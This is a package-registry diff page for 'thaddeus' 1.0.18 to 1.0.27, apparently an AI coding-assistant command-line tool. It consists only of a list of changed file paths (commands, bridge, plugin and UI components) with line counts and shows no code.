thaddeus 1.0.18 → 1.0.27

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2084) hide show
  1. package/package.json +14 -5
  2. package/src/QueryEngine.js +926 -0
  3. package/src/Task.js +49 -0
  4. package/src/Tool.js +61 -0
  5. package/src/assistant/gate.js +5 -0
  6. package/src/assistant/index.js +106 -0
  7. package/src/assistant/sessionHistory.js +145 -0
  8. package/src/bootstrap/state.js +1163 -0
  9. package/src/bridge/bridgeApi.js +304 -0
  10. package/src/bridge/bridgeConfig.js +39 -0
  11. package/src/bridge/bridgeDebug.js +73 -0
  12. package/src/bridge/bridgeEnabled.js +185 -0
  13. package/src/bridge/bridgeMain.js +2289 -0
  14. package/src/bridge/bridgeMessaging.js +353 -0
  15. package/src/bridge/bridgePermissionCallbacks.js +10 -0
  16. package/src/bridge/bridgePointer.js +175 -0
  17. package/src/bridge/bridgeStatusUtil.js +105 -0
  18. package/src/bridge/bridgeUI.js +411 -0
  19. package/src/bridge/capacityWake.js +35 -0
  20. package/src/bridge/codeSessionApi.js +111 -0
  21. package/src/bridge/createSession.js +273 -0
  22. package/src/bridge/debugUtils.js +115 -0
  23. package/src/bridge/envLessBridgeConfig.js +120 -0
  24. package/src/bridge/flushGate.js +65 -0
  25. package/src/bridge/inboundAttachments.js +152 -0
  26. package/src/bridge/inboundMessages.js +63 -0
  27. package/src/bridge/initReplBridge.js +431 -0
  28. package/src/bridge/jwtUtils.js +185 -0
  29. package/src/bridge/peerSessions.js +5 -0
  30. package/src/bridge/pollConfig.js +85 -0
  31. package/src/bridge/pollConfigDefaults.js +62 -0
  32. package/src/bridge/remoteBridgeCore.js +712 -0
  33. package/src/bridge/replBridge.js +1719 -0
  34. package/src/bridge/replBridgeHandle.js +30 -0
  35. package/src/bridge/replBridgeTransport.js +236 -0
  36. package/src/bridge/sessionIdCompat.js +56 -0
  37. package/src/bridge/sessionRunner.js +421 -0
  38. package/src/bridge/trustedDevice.js +170 -0
  39. package/src/bridge/types.js +9 -0
  40. package/src/bridge/webhookSanitizer.js +6 -0
  41. package/src/bridge/workSecret.js +99 -0
  42. package/src/buddy/CompanionSprite.js +348 -0
  43. package/src/buddy/companion.js +107 -0
  44. package/src/buddy/prompt.js +33 -0
  45. package/src/buddy/sprites.js +488 -0
  46. package/src/buddy/types.js +90 -0
  47. package/src/buddy/useBuddyNotification.js +85 -0
  48. package/src/cli/bg.js +17 -0
  49. package/src/cli/exit.js +30 -0
  50. package/src/cli/handlers/agents.js +55 -0
  51. package/src/cli/handlers/auth.js +249 -0
  52. package/src/cli/handlers/autoMode.js +128 -0
  53. package/src/cli/handlers/mcp.js +335 -0
  54. package/src/cli/handlers/plugins.js +634 -0
  55. package/src/cli/handlers/templateJobs.js +19 -0
  56. package/src/cli/handlers/util.js +76 -0
  57. package/src/cli/ndjsonSafeStringify.js +27 -0
  58. package/src/cli/print.js +4294 -0
  59. package/src/cli/remoteIO.js +208 -0
  60. package/src/cli/structuredIO.js +644 -0
  61. package/src/cli/transports/HybridTransport.js +233 -0
  62. package/src/cli/transports/SSETransport.js +538 -0
  63. package/src/cli/transports/SerialBatchEventUploader.js +224 -0
  64. package/src/cli/transports/WebSocketTransport.js +613 -0
  65. package/src/cli/transports/WorkerStateUploader.js +88 -0
  66. package/src/cli/transports/ccrClient.js +711 -0
  67. package/src/cli/transports/transportUtils.js +39 -0
  68. package/src/cli/update.js +314 -0
  69. package/src/commandCenter/launch.js +39 -0
  70. package/src/commandCenter/phoneApi.js +168 -0
  71. package/src/commandCenter/phoneStore.js +159 -0
  72. package/src/commandCenter/reactorBus.js +130 -0
  73. package/src/commandCenter/server.js +288 -0
  74. package/src/commandCenter/server.ts +42 -7
  75. package/src/commandCenter/tunnel.js +199 -0
  76. package/src/commands/add-dir/add-dir.js +121 -0
  77. package/src/commands/add-dir/index.js +8 -0
  78. package/src/commands/add-dir/validation.js +76 -0
  79. package/src/commands/advisor.js +88 -0
  80. package/src/commands/agents/agents.js +10 -0
  81. package/src/commands/agents/index.js +7 -0
  82. package/src/commands/agents-platform/index.js +2 -0
  83. package/src/commands/assistant/index.js +86 -0
  84. package/src/commands/backup/index.js +31 -0
  85. package/src/commands/branch/branch.js +205 -0
  86. package/src/commands/branch/index.js +11 -0
  87. package/src/commands/bridge/bridge.js +513 -0
  88. package/src/commands/bridge/index.js +22 -0
  89. package/src/commands/bridge-kick.js +179 -0
  90. package/src/commands/brief.js +89 -0
  91. package/src/commands/btw/btw.js +235 -0
  92. package/src/commands/btw/index.js +9 -0
  93. package/src/commands/buddy/buddy.js +100 -0
  94. package/src/commands/buddy/index.js +11 -0
  95. package/src/commands/chrome/chrome.js +291 -0
  96. package/src/commands/chrome/index.js +10 -0
  97. package/src/commands/clear/caches.js +116 -0
  98. package/src/commands/clear/clear.js +5 -0
  99. package/src/commands/clear/conversation.js +189 -0
  100. package/src/commands/clear/index.js +9 -0
  101. package/src/commands/color/color.js +58 -0
  102. package/src/commands/color/index.js +9 -0
  103. package/src/commands/commit-push-pr.js +137 -0
  104. package/src/commands/commit.js +80 -0
  105. package/src/commands/compact/compact.js +194 -0
  106. package/src/commands/compact/index.js +11 -0
  107. package/src/commands/config/config.js +6 -0
  108. package/src/commands/config/index.js +8 -0
  109. package/src/commands/context/context-noninteractive.js +219 -0
  110. package/src/commands/context/context.js +45 -0
  111. package/src/commands/context/index.js +21 -0
  112. package/src/commands/coordinator.js +34 -0
  113. package/src/commands/copy/copy.js +366 -0
  114. package/src/commands/copy/index.js +7 -0
  115. package/src/commands/cost/cost.js +21 -0
  116. package/src/commands/cost/index.js +16 -0
  117. package/src/commands/createMovedToPluginCommand.js +33 -0
  118. package/src/commands/desktop/desktop.js +6 -0
  119. package/src/commands/desktop/index.js +22 -0
  120. package/src/commands/diff/diff.js +6 -0
  121. package/src/commands/diff/index.js +6 -0
  122. package/src/commands/doctor/doctor.js +6 -0
  123. package/src/commands/doctor/index.js +9 -0
  124. package/src/commands/effort/effort.js +166 -0
  125. package/src/commands/effort/index.js +11 -0
  126. package/src/commands/exit/exit.js +32 -0
  127. package/src/commands/exit/index.js +9 -0
  128. package/src/commands/export/export.js +87 -0
  129. package/src/commands/export/index.js +8 -0
  130. package/src/commands/extra-usage/extra-usage-core.js +99 -0
  131. package/src/commands/extra-usage/extra-usage-noninteractive.js +13 -0
  132. package/src/commands/extra-usage/extra-usage.js +15 -0
  133. package/src/commands/extra-usage/index.js +29 -0
  134. package/src/commands/fast/fast.js +276 -0
  135. package/src/commands/fast/index.js +19 -0
  136. package/src/commands/feedback/feedback.js +11 -0
  137. package/src/commands/feedback/index.js +20 -0
  138. package/src/commands/files/files.js +11 -0
  139. package/src/commands/files/index.js +9 -0
  140. package/src/commands/force-snip.js +19 -0
  141. package/src/commands/fork/index.js +67 -0
  142. package/src/commands/heapdump/heapdump.js +14 -0
  143. package/src/commands/heapdump/index.js +9 -0
  144. package/src/commands/help/help.js +6 -0
  145. package/src/commands/help/index.js +7 -0
  146. package/src/commands/hooks/hooks.js +12 -0
  147. package/src/commands/hooks/index.js +8 -0
  148. package/src/commands/ide/ide.js +615 -0
  149. package/src/commands/ide/index.js +8 -0
  150. package/src/commands/init-verifiers.js +258 -0
  151. package/src/commands/init.js +248 -0
  152. package/src/commands/insights.js +2554 -0
  153. package/src/commands/install-github-app/ApiKeyStep.js +230 -0
  154. package/src/commands/install-github-app/CheckExistingSecretStep.js +194 -0
  155. package/src/commands/install-github-app/CheckGitHubStep.js +16 -0
  156. package/src/commands/install-github-app/ChooseRepoStep.js +211 -0
  157. package/src/commands/install-github-app/CreatingStep.js +53 -0
  158. package/src/commands/install-github-app/ErrorStep.js +84 -0
  159. package/src/commands/install-github-app/ExistingWorkflowStep.js +105 -0
  160. package/src/commands/install-github-app/InstallAppStep.js +97 -0
  161. package/src/commands/install-github-app/OAuthFlowStep.js +190 -0
  162. package/src/commands/install-github-app/SuccessStep.js +94 -0
  163. package/src/commands/install-github-app/WarningsStep.js +71 -0
  164. package/src/commands/install-github-app/index.js +10 -0
  165. package/src/commands/install-github-app/install-github-app.js +593 -0
  166. package/src/commands/install-github-app/setupGitHubActions.js +227 -0
  167. package/src/commands/install-slack-app/index.js +9 -0
  168. package/src/commands/install-slack-app/install-slack-app.js +25 -0
  169. package/src/commands/install.js +198 -0
  170. package/src/commands/keybindings/index.js +10 -0
  171. package/src/commands/keybindings/keybindings.js +47 -0
  172. package/src/commands/login/index.js +21 -0
  173. package/src/commands/login/login.js +135 -0
  174. package/src/commands/logout/index.js +11 -0
  175. package/src/commands/logout/logout.js +75 -0
  176. package/src/commands/mcp/addCommand.js +183 -0
  177. package/src/commands/mcp/index.js +9 -0
  178. package/src/commands/mcp/mcp.js +78 -0
  179. package/src/commands/mcp/xaaIdpCommand.js +193 -0
  180. package/src/commands/memories/index.js +9 -0
  181. package/src/commands/memories/index.ts +12 -0
  182. package/src/commands/memories/memories.tsx +950 -0
  183. package/src/commands/memory/index.js +7 -0
  184. package/src/commands/memory/memory.js +71 -0
  185. package/src/commands/mobile/index.js +9 -0
  186. package/src/commands/mobile/mobile.js +279 -0
  187. package/src/commands/model/index.js +14 -0
  188. package/src/commands/model/model.js +284 -0
  189. package/src/commands/output-style/index.js +8 -0
  190. package/src/commands/output-style/output-style.js +6 -0
  191. package/src/commands/passes/index.js +17 -0
  192. package/src/commands/passes/passes.js +23 -0
  193. package/src/commands/peers/index.js +68 -0
  194. package/src/commands/permissions/index.js +8 -0
  195. package/src/commands/permissions/permissions.js +9 -0
  196. package/src/commands/plan/index.js +8 -0
  197. package/src/commands/plan/plan.js +116 -0
  198. package/src/commands/plugin/AddMarketplace.js +96 -0
  199. package/src/commands/plugin/BrowseMarketplace.js +582 -0
  200. package/src/commands/plugin/DiscoverPlugins.js +613 -0
  201. package/src/commands/plugin/ManageMarketplaces.js +583 -0
  202. package/src/commands/plugin/ManagePlugins.js +1783 -0
  203. package/src/commands/plugin/PluginErrors.js +124 -0
  204. package/src/commands/plugin/PluginOptionsDialog.js +367 -0
  205. package/src/commands/plugin/PluginOptionsFlow.js +97 -0
  206. package/src/commands/plugin/PluginSettings.js +1041 -0
  207. package/src/commands/plugin/PluginTrustWarning.js +35 -0
  208. package/src/commands/plugin/UnifiedInstalledCell.js +616 -0
  209. package/src/commands/plugin/ValidatePlugin.js +96 -0
  210. package/src/commands/plugin/index.js +10 -0
  211. package/src/commands/plugin/parseArgs.js +71 -0
  212. package/src/commands/plugin/plugin.js +6 -0
  213. package/src/commands/plugin/pluginDetailsHelpers.js +95 -0
  214. package/src/commands/plugin/usePagination.js +89 -0
  215. package/src/commands/pr_comments/index.js +49 -0
  216. package/src/commands/privacy-settings/index.js +11 -0
  217. package/src/commands/privacy-settings/privacy-settings.js +55 -0
  218. package/src/commands/proactive.js +29 -0
  219. package/src/commands/rate-limit-options/index.js +15 -0
  220. package/src/commands/rate-limit-options/rate-limit-options.js +213 -0
  221. package/src/commands/release-notes/index.js +8 -0
  222. package/src/commands/release-notes/release-notes.js +38 -0
  223. package/src/commands/reload-plugins/index.js +11 -0
  224. package/src/commands/reload-plugins/reload-plugins.js +52 -0
  225. package/src/commands/remote-env/index.js +12 -0
  226. package/src/commands/remote-env/remote-env.js +6 -0
  227. package/src/commands/remote-setup/api.js +155 -0
  228. package/src/commands/remote-setup/index.js +15 -0
  229. package/src/commands/remote-setup/remote-setup.js +150 -0
  230. package/src/commands/remoteControlServer/index.js +58 -0
  231. package/src/commands/rename/generateSessionName.js +58 -0
  232. package/src/commands/rename/index.js +9 -0
  233. package/src/commands/rename/rename.js +52 -0
  234. package/src/commands/resume/index.js +9 -0
  235. package/src/commands/resume/resume.js +239 -0
  236. package/src/commands/review/UltrareviewOverageDialog.js +97 -0
  237. package/src/commands/review/reviewRemote.js +259 -0
  238. package/src/commands/review/ultrareviewCommand.js +58 -0
  239. package/src/commands/review/ultrareviewEnabled.js +10 -0
  240. package/src/commands/review.js +53 -0
  241. package/src/commands/rewind/index.js +10 -0
  242. package/src/commands/rewind/rewind.js +7 -0
  243. package/src/commands/sandbox-toggle/index.js +41 -0
  244. package/src/commands/sandbox-toggle/sandbox-toggle.js +73 -0
  245. package/src/commands/security-review.js +231 -0
  246. package/src/commands/session/index.js +13 -0
  247. package/src/commands/session/session.js +143 -0
  248. package/src/commands/skills/index.js +7 -0
  249. package/src/commands/skills/skills.js +6 -0
  250. package/src/commands/speak.js +21 -0
  251. package/src/commands/start-business.js +1575 -0
  252. package/src/commands/start-business.ts +1581 -0
  253. package/src/commands/stats/index.js +7 -0
  254. package/src/commands/stats/stats.js +6 -0
  255. package/src/commands/status/index.js +8 -0
  256. package/src/commands/status/status.js +6 -0
  257. package/src/commands/statusline.js +22 -0
  258. package/src/commands/stickers/index.js +8 -0
  259. package/src/commands/stickers/stickers.js +14 -0
  260. package/src/commands/subscribe-pr.js +131 -0
  261. package/src/commands/tag/index.js +9 -0
  262. package/src/commands/tag/tag.js +215 -0
  263. package/src/commands/tasks/index.js +8 -0
  264. package/src/commands/tasks/tasks.js +6 -0
  265. package/src/commands/terminalSetup/index.js +18 -0
  266. package/src/commands/terminalSetup/terminalSetup.js +491 -0
  267. package/src/commands/thaddeus-usage/index.js +17 -0
  268. package/src/commands/theme/index.js +7 -0
  269. package/src/commands/theme/theme.js +51 -0
  270. package/src/commands/thinkback/index.js +9 -0
  271. package/src/commands/thinkback/thinkback.js +528 -0
  272. package/src/commands/thinkback-play/index.js +13 -0
  273. package/src/commands/thinkback-play/thinkback-play.js +34 -0
  274. package/src/commands/torch.js +122 -0
  275. package/src/commands/ultraplan.js +416 -0
  276. package/src/commands/upgrade/index.js +12 -0
  277. package/src/commands/upgrade/upgrade.js +38 -0
  278. package/src/commands/usage/index.js +7 -0
  279. package/src/commands/usage/usage.js +6 -0
  280. package/src/commands/version.js +17 -0
  281. package/src/commands/vim/index.js +8 -0
  282. package/src/commands/vim/vim.js +25 -0
  283. package/src/commands/voice/index.js +13 -0
  284. package/src/commands/voice/voice.js +44 -0
  285. package/src/commands/workflows/index.js +123 -0
  286. package/src/commands.js +614 -0
  287. package/src/commands.ts +4 -0
  288. package/src/components/AgentProgressLine.js +112 -0
  289. package/src/components/AntModelSwitchCallout.js +8 -0
  290. package/src/components/App.js +46 -0
  291. package/src/components/ApproveApiKey.js +125 -0
  292. package/src/components/AutoModeOptInDialog.js +140 -0
  293. package/src/components/AutoUpdater.js +156 -0
  294. package/src/components/AutoUpdaterWrapper.js +78 -0
  295. package/src/components/AwsAuthStatusBox.js +88 -0
  296. package/src/components/BaseTextInput.js +105 -0
  297. package/src/components/BashModeProgress.js +49 -0
  298. package/src/components/BridgeDialog.js +415 -0
  299. package/src/components/BypassPermissionsModeDialog.js +87 -0
  300. package/src/components/ChannelDowngradeDialog.js +101 -0
  301. package/src/components/ClaudeInChromeOnboarding.js +126 -0
  302. package/src/components/ClaudeMdExternalIncludesDialog.js +137 -0
  303. package/src/components/ClickableImageRef.js +65 -0
  304. package/src/components/CompactSummary.js +120 -0
  305. package/src/components/ConfigurableShortcutHint.js +35 -0
  306. package/src/components/ConsoleOAuthFlow.js +554 -0
  307. package/src/components/ContextSuggestions.js +44 -0
  308. package/src/components/ContextVisualization.js +482 -0
  309. package/src/components/CoordinatorAgentStatus.js +261 -0
  310. package/src/components/CostThresholdDialog.js +49 -0
  311. package/src/components/CtrlOToExpand.js +50 -0
  312. package/src/components/CustomSelect/SelectMulti.js +150 -0
  313. package/src/components/CustomSelect/index.js +2 -0
  314. package/src/components/CustomSelect/option-map.js +32 -0
  315. package/src/components/CustomSelect/select-input-option.js +426 -0
  316. package/src/components/CustomSelect/select-option.js +24 -0
  317. package/src/components/CustomSelect/select.js +518 -0
  318. package/src/components/CustomSelect/use-multi-select-state.js +214 -0
  319. package/src/components/CustomSelect/use-select-input.js +170 -0
  320. package/src/components/CustomSelect/use-select-navigation.js +366 -0
  321. package/src/components/CustomSelect/use-select-state.js +22 -0
  322. package/src/components/DesktopHandoff.js +195 -0
  323. package/src/components/DesktopUpsell/DesktopUpsellStartup.js +174 -0
  324. package/src/components/DevBar.js +51 -0
  325. package/src/components/DevChannelsDialog.js +104 -0
  326. package/src/components/DiagnosticsDisplay.js +91 -0
  327. package/src/components/EffortCallout.js +264 -0
  328. package/src/components/EffortIndicator.js +28 -0
  329. package/src/components/ExitFlow.js +41 -0
  330. package/src/components/ExportDialog.js +101 -0
  331. package/src/components/FallbackToolUseErrorMessage.js +116 -0
  332. package/src/components/FallbackToolUseRejectedMessage.js +17 -0
  333. package/src/components/FastIcon.js +43 -0
  334. package/src/components/Feedback.js +369 -0
  335. package/src/components/FeedbackSurvey/FeedbackSurvey.js +151 -0
  336. package/src/components/FeedbackSurvey/FeedbackSurveyView.js +104 -0
  337. package/src/components/FeedbackSurvey/TranscriptSharePrompt.js +84 -0
  338. package/src/components/FeedbackSurvey/submitTranscriptShare.js +10 -0
  339. package/src/components/FeedbackSurvey/useDebouncedDigitInput.js +51 -0
  340. package/src/components/FeedbackSurvey/useFeedbackSurvey.js +258 -0
  341. package/src/components/FeedbackSurvey/useFrustrationDetection.js +8 -0
  342. package/src/components/FeedbackSurvey/useMemorySurvey.js +191 -0
  343. package/src/components/FeedbackSurvey/usePostCompactSurvey.js +202 -0
  344. package/src/components/FeedbackSurvey/useSurveyState.js +80 -0
  345. package/src/components/FileEditToolDiff.js +167 -0
  346. package/src/components/FileEditToolUpdatedMessage.js +112 -0
  347. package/src/components/FileEditToolUseRejectedMessage.js +158 -0
  348. package/src/components/FilePathLink.js +35 -0
  349. package/src/components/FullscreenLayout.js +578 -0
  350. package/src/components/GlobalSearchDialog.js +340 -0
  351. package/src/components/HelpV2/Commands.js +66 -0
  352. package/src/components/HelpV2/General.js +25 -0
  353. package/src/components/HelpV2/HelpV2.js +186 -0
  354. package/src/components/HighlightedCode/Fallback.js +193 -0
  355. package/src/components/HighlightedCode.js +185 -0
  356. package/src/components/HistorySearchDialog.js +93 -0
  357. package/src/components/IdeAutoConnectDialog.js +154 -0
  358. package/src/components/IdeOnboardingDialog.js +175 -0
  359. package/src/components/IdeStatusIndicator.js +50 -0
  360. package/src/components/IdleReturnDialog.js +117 -0
  361. package/src/components/InterruptedByUser.js +16 -0
  362. package/src/components/InvalidConfigDialog.js +135 -0
  363. package/src/components/InvalidSettingsDialog.js +85 -0
  364. package/src/components/KeybindingWarnings.js +55 -0
  365. package/src/components/LanguagePicker.js +84 -0
  366. package/src/components/LogSelector.js +1579 -0
  367. package/src/components/LogoV2/AnimatedAsterisk.js +43 -0
  368. package/src/components/LogoV2/AnimatedClawd.js +64 -0
  369. package/src/components/LogoV2/ChannelsNotice.js +262 -0
  370. package/src/components/LogoV2/Clawd.js +33 -0
  371. package/src/components/LogoV2/CondensedLogo.js +160 -0
  372. package/src/components/LogoV2/EmergencyTip.js +48 -0
  373. package/src/components/LogoV2/Feed.js +85 -0
  374. package/src/components/LogoV2/FeedColumn.js +55 -0
  375. package/src/components/LogoV2/GuestPassesUpsell.js +71 -0
  376. package/src/components/LogoV2/LogoV2.js +565 -0
  377. package/src/components/LogoV2/Opus1mMergeNotice.js +57 -0
  378. package/src/components/LogoV2/OverageCreditUpsell.js +161 -0
  379. package/src/components/LogoV2/VoiceModeNotice.js +71 -0
  380. package/src/components/LogoV2/WelcomeV2.js +14 -0
  381. package/src/components/LogoV2/feedConfigs.js +79 -0
  382. package/src/components/LspRecommendation/LspRecommendationMenu.js +46 -0
  383. package/src/components/MCPServerApprovalDialog.js +114 -0
  384. package/src/components/MCPServerDesktopImportDialog.js +206 -0
  385. package/src/components/MCPServerDialogCopy.js +16 -0
  386. package/src/components/MCPServerMultiselectDialog.js +134 -0
  387. package/src/components/ManagedSettingsSecurityDialog/ManagedSettingsSecurityDialog.js +150 -0
  388. package/src/components/ManagedSettingsSecurityDialog/utils.js +105 -0
  389. package/src/components/Markdown.js +233 -0
  390. package/src/components/MarkdownTable.js +280 -0
  391. package/src/components/MemoryUsageIndicator.js +28 -0
  392. package/src/components/Message.js +564 -0
  393. package/src/components/MessageModel.js +37 -0
  394. package/src/components/MessageResponse.js +73 -0
  395. package/src/components/MessageRow.js +346 -0
  396. package/src/components/MessageSelector.js +744 -0
  397. package/src/components/MessageTimestamp.js +58 -0
  398. package/src/components/Messages.js +645 -0
  399. package/src/components/ModelPicker.js +452 -0
  400. package/src/components/NativeAutoUpdater.js +152 -0
  401. package/src/components/NotebookEditToolUseRejectedMessage.js +84 -0
  402. package/src/components/OffscreenFreeze.js +35 -0
  403. package/src/components/Onboarding.js +174 -0
  404. package/src/components/OutputStylePicker.js +103 -0
  405. package/src/components/PackageManagerAutoUpdater.js +99 -0
  406. package/src/components/Passes/Passes.js +114 -0
  407. package/src/components/PrBadge.js +91 -0
  408. package/src/components/PressEnterToContinue.js +16 -0
  409. package/src/components/PromptInput/HistorySearchInput.js +45 -0
  410. package/src/components/PromptInput/IssueFlagBanner.js +8 -0
  411. package/src/components/PromptInput/Notifications.js +220 -0
  412. package/src/components/PromptInput/PromptInput.js +2014 -0
  413. package/src/components/PromptInput/PromptInputFooter.js +85 -0
  414. package/src/components/PromptInput/PromptInputFooterLeftSide.js +408 -0
  415. package/src/components/PromptInput/PromptInputFooterSuggestions.js +281 -0
  416. package/src/components/PromptInput/PromptInputHelpMenu.js +380 -0
  417. package/src/components/PromptInput/PromptInputModeIndicator.js +73 -0
  418. package/src/components/PromptInput/PromptInputQueuedCommands.js +105 -0
  419. package/src/components/PromptInput/PromptInputStashNotice.js +21 -0
  420. package/src/components/PromptInput/SandboxPromptFooterHint.js +66 -0
  421. package/src/components/PromptInput/ShimmeredInput.js +133 -0
  422. package/src/components/PromptInput/VoiceIndicator.js +137 -0
  423. package/src/components/PromptInput/inputModes.js +24 -0
  424. package/src/components/PromptInput/inputPaste.js +62 -0
  425. package/src/components/PromptInput/useMaybeTruncateInput.js +33 -0
  426. package/src/components/PromptInput/usePromptInputPlaceholder.js +53 -0
  427. package/src/components/PromptInput/useShowFastIconHint.js +23 -0
  428. package/src/components/PromptInput/useSwarmBanner.js +112 -0
  429. package/src/components/PromptInput/utils.js +50 -0
  430. package/src/components/QuickOpenDialog.js +244 -0
  431. package/src/components/RemoteCallout.js +53 -0
  432. package/src/components/RemoteEnvironmentDialog.js +346 -0
  433. package/src/components/ResumeTask.js +173 -0
  434. package/src/components/SandboxViolationExpandedView.js +106 -0
  435. package/src/components/SandboxViolationExpandedView.tsx +3 -0
  436. package/src/components/ScrollKeybindingHandler.js +982 -0
  437. package/src/components/SearchBox.js +56 -0
  438. package/src/components/SentryErrorBoundary.js +16 -0
  439. package/src/components/SessionBackgroundHint.js +105 -0
  440. package/src/components/SessionPreview.js +200 -0
  441. package/src/components/Settings/Config.js +1626 -0
  442. package/src/components/Settings/Settings.js +131 -0
  443. package/src/components/Settings/Status.js +230 -0
  444. package/src/components/Settings/Usage.js +341 -0
  445. package/src/components/ShowInIDEPrompt.js +152 -0
  446. package/src/components/SkillImprovementSurvey.js +130 -0
  447. package/src/components/Spinner/FlashingChar.js +52 -0
  448. package/src/components/Spinner/GlimmerMessage.js +329 -0
  449. package/src/components/Spinner/ShimmerChar.js +23 -0
  450. package/src/components/Spinner/SpinnerAnimationRow.js +170 -0
  451. package/src/components/Spinner/SpinnerGlyph.js +70 -0
  452. package/src/components/Spinner/TeammateSpinnerLine.js +171 -0
  453. package/src/components/Spinner/TeammateSpinnerTree.js +269 -0
  454. package/src/components/Spinner/index.js +9 -0
  455. package/src/components/Spinner/teammateSelectHint.js +1 -0
  456. package/src/components/Spinner/useShimmerAnimation.js +22 -0
  457. package/src/components/Spinner/useStalledAnimation.js +63 -0
  458. package/src/components/Spinner/utils.js +78 -0
  459. package/src/components/Spinner.js +474 -0
  460. package/src/components/Stats.js +1000 -0
  461. package/src/components/StatusLine.js +286 -0
  462. package/src/components/StatusNotices.js +50 -0
  463. package/src/components/StructuredDiff/Fallback.js +336 -0
  464. package/src/components/StructuredDiff/colorDiff.js +37 -0
  465. package/src/components/StructuredDiff.js +153 -0
  466. package/src/components/StructuredDiffList.js +9 -0
  467. package/src/components/TagTabs.js +101 -0
  468. package/src/components/TaskListV2.js +333 -0
  469. package/src/components/TeammateViewHeader.js +88 -0
  470. package/src/components/TeleportError.js +191 -0
  471. package/src/components/TeleportProgress.js +131 -0
  472. package/src/components/TeleportRepoMismatchDialog.js +98 -0
  473. package/src/components/TeleportResumeWrapper.js +158 -0
  474. package/src/components/TeleportStash.js +82 -0
  475. package/src/components/TextInput.js +108 -0
  476. package/src/components/ThaddeusHint/PluginHintMenu.js +37 -0
  477. package/src/components/ThemePicker.js +331 -0
  478. package/src/components/ThinkingToggle.js +154 -0
  479. package/src/components/TokenWarning.js +171 -0
  480. package/src/components/ToolUseLoader.js +35 -0
  481. package/src/components/TrustDialog/TrustDialog.js +301 -0
  482. package/src/components/TrustDialog/utils.js +199 -0
  483. package/src/components/UndercoverAutoCallout.js +5 -0
  484. package/src/components/ValidationErrorsList.js +147 -0
  485. package/src/components/VimTextInput.js +136 -0
  486. package/src/components/VirtualMessageList.js +893 -0
  487. package/src/components/WorkflowMultiselectDialog.js +118 -0
  488. package/src/components/WorktreeExitDialog.js +220 -0
  489. package/src/components/agents/AgentDetail.js +227 -0
  490. package/src/components/agents/AgentEditor.js +147 -0
  491. package/src/components/agents/AgentNavigationFooter.js +22 -0
  492. package/src/components/agents/AgentsList.js +436 -0
  493. package/src/components/agents/AgentsMenu.js +849 -0
  494. package/src/components/agents/ColorPicker.js +110 -0
  495. package/src/components/agents/ModelSelector.js +63 -0
  496. package/src/components/agents/SnapshotUpdateDialog.js +14 -0
  497. package/src/components/agents/ToolSelector.js +557 -0
  498. package/src/components/agents/agentFileUtils.js +179 -0
  499. package/src/components/agents/generateAgent.js +161 -0
  500. package/src/components/agents/new-agent-creation/CreateAgentWizard.js +89 -0
  501. package/src/components/agents/new-agent-creation/wizard-steps/ColorStep.js +81 -0
  502. package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStep.js +387 -0
  503. package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStepWrapper.js +63 -0
  504. package/src/components/agents/new-agent-creation/wizard-steps/DescriptionStep.js +126 -0
  505. package/src/components/agents/new-agent-creation/wizard-steps/GenerateStep.js +118 -0
  506. package/src/components/agents/new-agent-creation/wizard-steps/LocationStep.js +80 -0
  507. package/src/components/agents/new-agent-creation/wizard-steps/MemoryStep.js +108 -0
  508. package/src/components/agents/new-agent-creation/wizard-steps/MethodStep.js +80 -0
  509. package/src/components/agents/new-agent-creation/wizard-steps/ModelStep.js +49 -0
  510. package/src/components/agents/new-agent-creation/wizard-steps/PromptStep.js +131 -0
  511. package/src/components/agents/new-agent-creation/wizard-steps/ToolsStep.js +52 -0
  512. package/src/components/agents/new-agent-creation/wizard-steps/TypeStep.js +100 -0
  513. package/src/components/agents/types.js +4 -0
  514. package/src/components/agents/utils.js +14 -0
  515. package/src/components/agents/validateAgent.js +79 -0
  516. package/src/components/design-system/Byline.js +72 -0
  517. package/src/components/design-system/Dialog.js +117 -0
  518. package/src/components/design-system/Divider.js +110 -0
  519. package/src/components/design-system/FuzzyPicker.js +191 -0
  520. package/src/components/design-system/KeyboardShortcutHint.js +68 -0
  521. package/src/components/design-system/ListItem.js +184 -0
  522. package/src/components/design-system/LoadingState.js +69 -0
  523. package/src/components/design-system/Pane.js +69 -0
  524. package/src/components/design-system/ProgressBar.js +63 -0
  525. package/src/components/design-system/Ratchet.js +71 -0
  526. package/src/components/design-system/StatusIcon.js +70 -0
  527. package/src/components/design-system/Tabs.js +269 -0
  528. package/src/components/design-system/ThemeProvider.js +137 -0
  529. package/src/components/design-system/ThemedBox.js +126 -0
  530. package/src/components/design-system/ThemedText.js +60 -0
  531. package/src/components/design-system/color.js +22 -0
  532. package/src/components/diff/DiffDetailView.js +285 -0
  533. package/src/components/diff/DiffDialog.js +387 -0
  534. package/src/components/diff/DiffFileList.js +292 -0
  535. package/src/components/grove/Grove.js +483 -0
  536. package/src/components/hooks/HooksConfigMenu.js +583 -0
  537. package/src/components/hooks/PromptDialog.js +82 -0
  538. package/src/components/hooks/SelectEventMode.js +118 -0
  539. package/src/components/hooks/SelectHookMode.js +101 -0
  540. package/src/components/hooks/SelectMatcherMode.js +131 -0
  541. package/src/components/hooks/ViewHookMode.js +204 -0
  542. package/src/components/mcp/CapabilitiesSection.js +56 -0
  543. package/src/components/mcp/ElicitationDialog.js +945 -0
  544. package/src/components/mcp/MCPAgentServerMenu.js +95 -0
  545. package/src/components/mcp/MCPListPanel.js +505 -0
  546. package/src/components/mcp/MCPReconnect.js +168 -0
  547. package/src/components/mcp/MCPRemoteServerMenu.js +460 -0
  548. package/src/components/mcp/MCPSettings.js +414 -0
  549. package/src/components/mcp/MCPStdioServerMenu.js +95 -0
  550. package/src/components/mcp/MCPToolDetailView.js +219 -0
  551. package/src/components/mcp/MCPToolListView.js +137 -0
  552. package/src/components/mcp/McpParsingWarnings.js +212 -0
  553. package/src/components/mcp/index.js +8 -0
  554. package/src/components/mcp/utils/reconnectHelpers.js +35 -0
  555. package/src/components/memory/MemoryFileSelector.js +454 -0
  556. package/src/components/memory/MemoryUpdateNotification.js +43 -0
  557. package/src/components/messageActions.js +418 -0
  558. package/src/components/messages/AdvisorMessage.js +152 -0
  559. package/src/components/messages/AssistantRedactedThinkingMessage.js +28 -0
  560. package/src/components/messages/AssistantTextMessage.js +287 -0
  561. package/src/components/messages/AssistantThinkingMessage.js +70 -0
  562. package/src/components/messages/AssistantToolUseMessage.js +324 -0
